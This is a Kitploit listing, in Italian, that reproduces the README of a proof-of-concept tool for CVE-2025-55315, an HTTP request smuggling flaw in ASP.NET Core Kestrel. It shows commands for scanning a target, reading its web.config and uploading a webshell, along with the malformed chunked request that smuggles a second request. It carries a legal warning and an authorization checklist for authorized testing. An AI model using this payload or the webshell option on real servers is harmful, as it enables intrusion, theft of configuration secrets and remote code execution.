Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC Exploit | Kitploit
Strumenti/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC Exploit

Vedi Repository
85910 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55315 Strumento di Pentest

Strumento di sfruttamento dello smuggling di richieste HTTP per ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ AVVISO LEGALE

QUESTO STRUMENTO È SOLO PER TEST DI SICUREZZA AUTORIZZATI!

  • Utilizzare SOLO su sistemi di propria proprietà o per i quali si ha esplicita autorizzazione scritta per i test
  • L'accesso non autorizzato a sistemi informatici è ILLEGALE
  • Il creatore dello strumento NON è responsabile per un uso improprio
  • Usando questo strumento, accetti la piena responsabilità legale

📋 Panoramica

Strumento professionale per penetration testing per CVE-2025-55315 (vulnerabilità di HTTP Request Smuggling in ASP.NET Core Kestrel). Questo strumento è progettato per l'analisi di un singolo target con capacità di sfruttamento complete.

Cos'è CVE-2025-55315?

Una vulnerabilità critica di HTTP Request Smuggling nel server web ASP.NET Core Kestrel (CVSS 9.9/10) che consente agli aggressori di:

  • Bypassare l'autenticazione
  • Rubare credenziali e token di sessione
  • Eseguire Server-Side Request Forgery (SSRF)
  • Avvelenare le cache
  • Caricare webshell e ottenere esecuzione di codice remota

Versioni affette:

  • .NET Core 3.0 fino a .NET 9.0.9
  • Corretto in: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Caratteristiche

Funzionalità principali

  • ✅ Analisi di un singolo target - Penetration testing mirato su un target specifico
  • ✅ Scoperta automatica degli endpoint - Scopre endpoint comuni di ASP.NET Core
  • ✅ Test manuale degli endpoint - Testa endpoint specifici di interesse
  • ✅ Rilevamento vulnerabilità - Rilevamento accurato di CVE-2025-55315
  • ✅ Estrazione di web.config - Legge file di configurazione tramite request smuggling
  • ✅ Caricamento webshell - Capacità opzionale di distribuzione webshell
  • ✅ Report dettagliati - Report in formato JSON e testo
  • ✅ Funzioni di sicurezza - Molteplici richieste di conferma per azioni distruttive

Caratteristiche tecniche

  • Supporto HTTP/1.1 e HTTPS
  • Supporto porta personalizzata
  • Timeout configurabili
  • Modalità debug verbose
  • Output terminale con colori
  • Bypass della validazione del certificato SSL (per test)

🔧 Installazione

Requisiti

# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Download

# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

🚀 Avvio Rapido

Scansione di base della vulnerabilità

python3 cve_2025_55315_PoC.py -t target.com

Questo farà:

  1. Raccogliere informazioni sul server
  2. Scoprire automaticamente gli endpoint attivi
  3. Testare ogni endpoint per CVE-2025-55315
  4. Mostrare i risultati nel terminale

Test di un endpoint specifico

python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Scansione completa con estrazione di web.config

python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Avanzato: Sfruttamento completo (Solo autorizzato!)

python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 Esempi di Utilizzo

Esempio 1: Controllo rapido

Scenario: Verificare se il server di produzione è vulnerabile

python3 cve_2025_55315_PoC.py -t api.mycompany.com

Durata prevista: 30-60 secondi


Esempio 2: Scansione dettagliata

Scenario: Scansione completa dell'endpoint con output verboso

python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Durata prevista: 2-5 minuti


Esempio 3: Testare più endpoint

Scenario: Testare endpoint critici specifici

python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Esempio 4: Target senza SSL

Scenario: Testare un server HTTP interno

python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 Opzioni della riga di comando

usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)
  -h, --help           Show help message

🔍 Interpretazione dell'Output

Esempio di sistema vulnerabile

Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

Interpretazione:

  • 🔴 VULNERABILITÀ CRITICA RILEVATA
  • 🔴 Molteplici endpoint sono vulnerabili
  • 🔴 Il file di configurazione è stato estratto con successo
  • ⚡ URGENTE: Aggiornare a .NET 8.0.21+ o 9.0.10+

Esempio di sistema sicuro

Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

Interpretazione:

  • ✅ IL SISTEMA È SICURO
  • ✅ Esecuzione di versione Kestrel patchata
  • ✅ Tutte le richieste malformate rifiutate

🛡️ Sicurezza ed Etica

Checklist di autorizzazione

Prima di eseguire questo strumento, assicurati:

  • Possiedi il sistema target, OPPURE
  • Hai un'autorizzazione scritta per testare, E
  • Il team di sicurezza è stato informato, E
  • Hai un piano di rollback, E
  • Comprendi le implicazioni legali

Funzioni di sicurezza integrate

  1. Conferma in due fasi - Lo strumento chiede autorizzazione prima di iniziare
  2. Conferma caricamento webshell - Richiede di digitare "YES" in maiuscolo
  3. Limitazione della velocità - Ritardi tra le richieste durante l'auto-scoperta
  4. Protezione timeout - Previene connessioni in sospeso
  5. Registrazione dettagliata - Tutte le azioni sono registrate per tracciabilità

🔬 Dettagli Tecnici

Tecnica di sfruttamento

Lo strumento sfrutta CVE-2025-55315 utilizzando una codifica di trasferimento chunked malformata:

POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com
Scarica lo strumento